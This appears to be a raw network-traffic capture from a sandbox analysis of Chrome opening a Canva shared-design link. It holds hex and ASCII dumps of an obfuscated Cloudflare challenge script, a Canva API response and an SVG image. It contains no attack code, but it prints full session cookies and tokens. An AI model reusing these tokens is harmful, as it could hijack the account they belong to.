                                                                                                                                                                                                                                                                    Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC718INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:45 GMT
                                                                                                                                                                                                                                                                    Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                    Content-Length: 8084
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    cache-control: max-age=14400, stale-if-error=10800, stale-while-revalidate=10800, public
                                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o%2BiljrRvI0VvB5uiTTMNW5nG35DpcQftPrJeEMCtVGBeoeH%2BnOK1QaaMzTCJ6nNuK3RBX5AWT8GE1aElwvPY5mBY2T4UVDozWfeDP1cHzfZ98JwOcJQkHRSb8CXvR6U%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    CF-RAY: 8e59512c59564213-EWR
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC651INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 46 50 57 76 3a 27 62 27 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 56 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 73 2c 76 29 7b 56 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 65 2c 55 2c 66 2c 67 29 7b 66 6f 72 28 55 3d 62 2c 66 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 67 3d 2d 70 61 72 73 65 49 6e 74 28 55 28 34 39 35 29 29 2f 31 2b 2d 70 61 72 73 65 49 6e 74 28 55 28 34 38 39 29 29 2f 32 2b 70 61 72 73 65 49 6e 74 28 55 28 33 39 37 29 29 2f 33 2b 2d 70 61 72 73 65 49 6e 74 28 55 28 34 37 39 29 29 2f 34 2b 70 61 72 73 65 49 6e 74 28 55 28 34 33 32 29 29 2f 35 2a 28 2d 70 61 72 73 65 49 6e 74 28 55 28 34 38 30 29 29 2f 36 29 2b 2d 70 61 72 73 65 49 6e 74 28 55 28 34 30 38 29 29 2f 37 2a 28 2d 70 61
                                                                                                                                                                                                                                                                    Data Ascii: window._cf_chl_opt={cFPWv:'b'};~function(V,h,i,j,k,l,s,v){V=b,function(c,e,U,f,g){for(U=b,f=c();!![];)try{if(g=-parseInt(U(495))/1+-parseInt(U(489))/2+parseInt(U(397))/3+-parseInt(U(479))/4+parseInt(U(432))/5*(-parseInt(U(480))/6)+-parseInt(U(408))/7*(-pa
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 4c 3d 33 2c 4d 3d 32 2c 4e 3d 5b 5d 2c 4f 3d 30 2c 50 3d 30 2c 51 3d 30 3b 51 3c 44 5b 59 28 34 32 37 29 5d 3b 51 2b 3d 31 29 69 66 28 52 3d 44 5b 59 28 34 34 31 29 5d 28 51 29 2c 4f 62 6a 65 63 74 5b 59 28 34 36 35 29 5d 5b 59 28 34 35 36 29 5d 5b 59 28 34 39 30 29 5d 28 48 2c 52 29 7c 7c 28 48 5b 52 5d 3d 4c 2b 2b 2c 49 5b 52 5d 3d 21 30 29 2c 53 3d 4a 2b 52 2c 4f 62 6a 65 63 74 5b 59 28 34 36 35 29 5d 5b 59 28 34 35 36 29 5d 5b 59 28 34 39 30 29 5d 28 48 2c 53 29 29 4a 3d 53 3b 65 6c 73 65 7b 69 66 28 4f 62 6a 65 63 74 5b 59 28 34 36 35 29 5d 5b 59 28 34 35 36 29 5d 5b 59 28 34 39 30 29 5d 28 49 2c 4a 29 29 7b 69 66 28 32 35 36 3e 4a 5b 59 28 34 38 35 29 5d 28 30 29 29 7b 66 6f 72 28 47 3d 30 3b 47 3c 4d 3b 4f 3c 3c 3d 31 2c 45 2d 31 3d 3d 50 3f 28 50
                                                                                                                                                                                                                                                                    Data Ascii: L=3,M=2,N=[],O=0,P=0,Q=0;Q<D[Y(427)];Q+=1)if(R=D[Y(441)](Q),Object[Y(465)][Y(456)][Y(490)](H,R)||(H[R]=L++,I[R]=!0),S=J+R,Object[Y(465)][Y(456)][Y(490)](H,S))J=S;else{if(Object[Y(465)][Y(456)][Y(490)](I,J)){if(256>J[Y(485)](0)){for(G=0;G<M;O<<=1,E-1==P?(P
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 45 2d 31 3d 3d 50 29 7b 4e 5b 59 28 33 39 35 29 5d 28 46 28 4f 29 29 3b 62 72 65 61 6b 7d 65 6c 73 65 20 50 2b 2b 3b 72 65 74 75 72 6e 20 4e 5b 59 28 34 36 34 29 5d 28 27 27 29 7d 2c 27 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 44 2c 5a 29 7b 72 65 74 75 72 6e 20 5a 3d 57 2c 6e 75 6c 6c 3d 3d 44 3f 27 27 3a 44 3d 3d 27 27 3f 6e 75 6c 6c 3a 66 2e 69 28 44 5b 5a 28 34 32 37 29 5d 2c 33 32 37 36 38 2c 66 75 6e 63 74 69 6f 6e 28 45 2c 61 30 29 7b 72 65 74 75 72 6e 20 61 30 3d 5a 2c 44 5b 61 30 28 34 38 35 29 5d 28 45 29 7d 29 7d 2c 27 69 27 3a 66 75 6e 63 74 69 6f 6e 28 44 2c 45 2c 46 2c 61 31 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 4e 2c 4f 2c 50 2c 51 2c 52 2c 54 2c 53 29 7b 66 6f 72 28 61 31 3d 57 2c 47 3d 5b 5d 2c 48 3d 34 2c 49 3d 34 2c 4a 3d 33 2c 4b 3d
                                                                                                                                                                                                                                                                    Data Ascii: E-1==P){N[Y(395)](F(O));break}else P++;return N[Y(464)]('')},'j':function(D,Z){return Z=W,null==D?'':D==''?null:f.i(D[Z(427)],32768,function(E,a0){return a0=Z,D[a0(485)](E)})},'i':function(D,E,F,a1,G,H,I,J,K,L,M,N,O,P,Q,R,T,S){for(a1=W,G=[],H=4,I=4,J=3,K=
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 5b 56 28 34 38 38 29 5d 3d 27 62 27 2c 6c 3d 6b 2c 68 5b 56 28 34 33 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 44 2c 45 2c 46 2c 61 36 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 29 7b 69 66 28 61 36 3d 56 2c 44 3d 3d 3d 6e 75 6c 6c 7c 7c 76 6f 69 64 20 30 3d 3d 3d 44 29 72 65 74 75 72 6e 20 46 3b 66 6f 72 28 48 3d 6f 28 44 29 2c 67 5b 61 36 28 33 39 34 29 5d 5b 61 36 28 34 37 34 29 5d 26 26 28 48 3d 48 5b 61 36 28 33 39 30 29 5d 28 67 5b 61 36 28 33 39 34 29 5d 5b 61 36 28 34 37 34 29 5d 28 44 29 29 29 2c 48 3d 67 5b 61 36 28 34 30 30 29 5d 5b 61 36 28 34 38 34 29 5d 26 26 67 5b 61 36 28 34 34 35 29 5d 3f 67 5b 61 36 28 34 30 30 29 5d 5b 61 36 28 34 38 34 29 5d 28 6e 65 77 20 67 5b 28 61 36 28 34 34 35 29 29 5d 28 48 29 29 3a 66 75 6e 63 74 69 6f 6e 28 4e 2c
                                                                                                                                                                                                                                                                    Data Ascii: [V(488)]='b',l=k,h[V(435)]=function(g,D,E,F,a6,H,I,J,K,L,M){if(a6=V,D===null||void 0===D)return F;for(H=o(D),g[a6(394)][a6(474)]&&(H=H[a6(390)](g[a6(394)][a6(474)](D))),H=g[a6(400)][a6(484)]&&g[a6(445)]?g[a6(400)][a6(484)](new g[(a6(445))](H)):function(N,
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 3d 3d 67 5b 44 5d 29 72 65 74 75 72 6e 20 67 5b 44 5d 3d 3d 3d 76 6f 69 64 20 30 3f 27 75 27 3a 27 78 27 7d 63 61 74 63 68 28 47 29 7b 72 65 74 75 72 6e 27 69 27 7d 72 65 74 75 72 6e 20 65 5b 61 33 28 34 30 30 29 5d 5b 61 33 28 34 30 35 29 5d 28 67 5b 44 5d 29 3f 27 61 27 3a 67 5b 44 5d 3d 3d 3d 65 5b 61 33 28 34 30 30 29 5d 3f 27 43 27 3a 67 5b 44 5d 3d 3d 3d 21 30 3f 27 54 27 3a 67 5b 44 5d 3d 3d 3d 21 31 3f 27 46 27 3a 28 45 3d 74 79 70 65 6f 66 20 67 5b 44 5d 2c 61 33 28 34 39 32 29 3d 3d 45 3f 6d 28 65 2c 67 5b 44 5d 29 3f 27 4e 27 3a 27 66 27 3a 6c 5b 45 5d 7c 7c 27 3f 27 29 7d 66 75 6e 63 74 69 6f 6e 20 78 28 61 39 2c 67 2c 44 2c 45 2c 46 2c 47 29 7b 61 39 3d 56 3b 74 72 79 7b 72 65 74 75 72 6e 20 67 3d 69 5b 61 39 28 34 31 32 29 5d 28 61 39 28 34
                                                                                                                                                                                                                                                                    Data Ascii: ==g[D])return g[D]===void 0?'u':'x'}catch(G){return'i'}return e[a3(400)][a3(405)](g[D])?'a':g[D]===e[a3(400)]?'C':g[D]===!0?'T':g[D]===!1?'F':(E=typeof g[D],a3(492)==E?m(e,g[D])?'N':'f':l[E]||'?')}function x(a9,g,D,E,F,G){a9=V;try{return g=i[a9(412)](a9(4
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 64 28 34 36 30 29 5d 3d 68 5b 61 64 28 34 33 34 29 5d 5b 61 64 28 34 36 30 29 5d 2c 4c 5b 61 64 28 34 30 32 29 5d 3d 68 5b 61 64 28 34 33 34 29 5d 5b 61 64 28 34 32 36 29 5d 2c 4d 3d 4c 2c 4a 5b 61 64 28 34 33 31 29 5d 28 4b 2c 49 2c 21 21 5b 5d 29 2c 4a 5b 61 64 28 34 37 32 29 5d 3d 32 35 30 30 2c 4a 5b 61 64 28 34 37 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 4a 5b 61 64 28 34 36 38 29 5d 28 61 64 28 34 35 37 29 2c 61 64 28 33 39 39 29 29 2c 4e 3d 7b 7d 2c 4e 5b 61 64 28 34 36 37 29 5d 3d 47 2c 4e 5b 61 64 28 34 38 37 29 5d 3d 4d 2c 4e 5b 61 64 28 34 38 32 29 5d 3d 61 64 28 33 39 38 29 2c 4f 3d 6a 5b 61 64 28 34 35 30 29 5d 28 4a 53 4f 4e 5b 61 64 28 34 35 35 29 5d 28 4e 29 29 5b 61 64 28 34 36 36 29 5d 28 27 2b 27 2c 61 64 28 34 39 38 29 29 2c
                                                                                                                                                                                                                                                                    Data Ascii: d(460)]=h[ad(434)][ad(460)],L[ad(402)]=h[ad(434)][ad(426)],M=L,J[ad(431)](K,I,!![]),J[ad(472)]=2500,J[ad(477)]=function(){},J[ad(468)](ad(457),ad(399)),N={},N[ad(467)]=G,N[ad(487)]=M,N[ad(482)]=ad(398),O=j[ad(450)](JSON[ad(455)](N))[ad(466)]('+',ad(498)),
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC588INData Raw: 6d 65 2c 63 68 6c 41 70 69 52 75 6d 57 69 64 67 65 74 41 67 65 4d 73 2c 72 65 6d 6f 76 65 43 68 69 6c 64 2c 66 6c 6f 6f 72 2c 69 73 4e 61 4e 2c 6a 6f 69 6e 2c 70 72 6f 74 6f 74 79 70 65 2c 72 65 70 6c 61 63 65 2c 65 72 72 6f 72 49 6e 66 6f 4f 62 6a 65 63 74 2c 73 65 74 52 65 71 75 65 73 74 48 65 61 64 65 72 2c 2f 62 65 61 63 6f 6e 2f 6f 76 2c 50 4f 53 54 2c 2f 30 2e 32 34 35 35 34 32 31 33 35 39 34 31 38 37 37 34 33 3a 31 37 33 32 31 31 33 38 33 33 3a 4e 76 48 31 53 46 50 6a 46 79 30 32 30 74 65 4b 63 65 70 52 63 65 63 75 48 45 45 2d 4e 34 54 70 63 30 78 32 4d 62 33 6f 79 7a 77 2f 2c 74 69 6d 65 6f 75 74 2c 39 39 36 33 38 30 73 57 72 7a 68 52 2c 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 4e 61 6d 65 73 2c 72 65 61 64 79 53 74 61 74 65 2c 6e 75 6d 62 65 72
                                                                                                                                                                                                                                                                    Data Ascii: me,chlApiRumWidgetAgeMs,removeChild,floor,isNaN,join,prototype,replace,errorInfoObject,setRequestHeader,/beacon/ov,POST,/0.24554213594187743:1732113833:NvH1SFPjFy020teKcepRcecuHEE-N4Tpc0x2Mb3oyzw/,timeout,996380sWrzhR,getOwnPropertyNames,readyState,number


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    73192.168.2.1249801104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1875OUTGET /_ajax/reaction/config/DAGXBQfQ3AM?documentExtension=BvO9V97vV3Qk87FqBY6pdQ HTTP/1.1
                                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    X-Canva-Brand: BAAAAAAAAAA
                                                                                                                                                                                                                                                                    X-Canva-App: design_viewer
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    X-Canva-Build-Sha: 4aaacc3
                                                                                                                                                                                                                                                                    X-Canva-User: UAAAAAAAAAA
                                                                                                                                                                                                                                                                    X-Canva-Analytics: AAMAA1dFQgA=
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    X-Canva-Request: getreactionconfigapi
                                                                                                                                                                                                                                                                    sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                    X-Canva-Locale: en
                                                                                                                                                                                                                                                                    X-Canva-Build-Name: 20241118-21
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view?utm_content=DAGXBQfQ3AM&utm_campaign=designshare&utm_medium=link&utm_source=editor
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1061INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:45 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript;charset=utf-8
                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59512e6e86c470-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Pragma: No-cache
                                                                                                                                                                                                                                                                    accept-ch: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                    content-security-policy: frame-ancestors 'self' https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;
                                                                                                                                                                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                                    x-frame-options: sameorigin
                                                                                                                                                                                                                                                                    x-request-id: 8e59512e6e86c470
                                                                                                                                                                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SvdFPQ3AFrMDbBFd1yeEAEdoeH5izaTiHVhcAzkW9odKcGdwi6jynMTQCFGv10hkhIRpAoj7c4YXdUxtI9wf5rLgWkZ%2Bdnv9HIELtHfyEvIytZ%2FhplpIc5iwn9GGYYY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC58INData Raw: 33 34 0d 0a 27 22 5d 29 7d 77 68 69 6c 65 28 31 29 3b 3c 2f 78 3e 2f 2f 7b 22 41 22 3a 7b 22 41 22 3a 66 61 6c 73 65 7d 2c 22 42 22 3a 7b 22 41 22 3a 74 72 75 65 7d 7d 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 34'"])}while(1);</x>//{"A":{"A":false},"B":{"A":true}}
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    74192.168.2.1249798104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC871OUTGET /web/images/749002f5a04f784cc1802d77d2fed423.svg HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1189INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:45 GMT
                                                                                                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                    Content-Length: 2725
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59512eea070c82-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 1583352
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "749002f5a04f784cc1802d77d2fed423"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:31 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Thu, 12 Sep 2024 09:09:04 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Sat, 13 Sep 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: Tz7SQD/JpRRsclcmnT6ufA3oZuf90FX3arphDjfxhfMfsqDpLW2+jntDGv4wMhRirusFIehSBxs=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: 0JZMVBSQDKF4QED9
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: bRl9W2hnRIqMdZrXuZZA2_nYmFfi7jbn
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC350INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 61 55 41 74 76 6c 6a 66 64 50 57 4f 79 55 37 48 75 68 33 6d 49 65 35 33 78 33 45 61 6b 4d 41 54 73 46 25 32 46 62 72 4b 45 55 32 69 43 38 63 33 31 34 34 72 79 47 36 78 4f 4c 78 46 4a 71 48 44 4a 51 4e 71 71 37 4c 69 38 47 41 58 4b 74 67 71 34 70 43 59 51 78 34 68 53 64 50 4b 44 71 53 36 43 69 5a 63 65 25 32 46 70 51 77 4f 67 75 33 4e 5a 61 39 25 32 42 72 4b 79 6c 79 54 72 6e 64 6d 56 46 64 32 4a 34 51 7a 51 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aUAtvljfdPWOyU7Huh3mIe53x3EakMATsF%2FbrKEU2iC8c3144ryG6xOLxFJqHDJQNqq7Li8GAXKtgq4pCYQx4hSdPKDqS6CiZce%2FpQwOgu3NZa9%2BrKylyTrndmVFd2J4QzQ%3D"}],"group":"cf-nel","max_age":604800
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1199INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 36 30 22 20 68 65 69 67 68 74 3d 22 36 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 36 30 20 36 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 39 2e 38 30 38 20 33 31 2e 39 32 31 63 30 20 2e 39 36 33 2e 32 35 32 20 31 2e 36 31 32 2e 38 39 35 20 31 2e 36 31 32 20 31 2e 31 30 32 20 30 20 32 2e 31 38 39 2d 32 2e 39 39 35 20 32 2e 31 38 39 2d 34 2e 36 39 32 20 30 2d 2e 37 36 32 2d 2e 32 30 32 2d 31 2e 33 38 37 2d 2e 37 32 39 2d 31 2e 33 38 37 2d 31 2e 32 31 31 20 30 2d 32 2e 33 35 35 20 32 2e 37 39 37 2d 32 2e 33 35 35 20 34 2e 34 36 37 7a 6d 32 32 2e 33 34 37 2d 35 2e 30 31 31 63 30 20
                                                                                                                                                                                                                                                                    Data Ascii: <svg width="60" height="60" viewBox="0 0 60 60" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M19.808 31.921c0 .963.252 1.612.895 1.612 1.102 0 2.189-2.995 2.189-4.692 0-.762-.202-1.387-.729-1.387-1.211 0-2.355 2.797-2.355 4.467zm22.347-5.011c0
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1369INData Raw: 30 31 2d 32 2e 36 31 35 20 31 2e 38 30 31 2d 2e 38 36 38 20 30 2d 31 2e 35 33 35 2d 2e 35 36 39 2d 31 2e 37 38 37 2d 31 2e 37 32 37 2d 2e 36 35 34 20 31 2e 31 30 38 2d 31 2e 35 31 20 31 2e 37 33 36 2d 32 2e 35 36 38 20 31 2e 37 33 36 2d 31 2e 31 38 38 20 30 2d 31 2e 39 36 37 2d 2e 38 39 35 2d 32 2e 30 38 38 2d 32 2e 36 31 36 2d 31 2e 30 37 38 20 32 2e 30 37 37 2d 33 2e 30 37 35 20 33 2e 38 35 31 2d 35 2e 33 35 39 20 33 2e 38 35 31 43 38 2e 39 33 37 20 33 36 2e 30 37 34 20 37 20 33 33 2e 37 30 38 20 37 20 32 39 2e 37 38 33 20 37 20 32 34 2e 38 35 20 31 30 2e 38 35 20 32 31 20 31 34 2e 36 37 35 20 32 31 63 32 2e 33 31 36 20 30 20 33 2e 36 32 33 20 31 2e 31 38 32 20 33 2e 36 32 33 20 32 2e 37 39 33 20 30 20 31 2e 36 31 32 2d 31 2e 31 38 32 20 32 2e 37 39 34
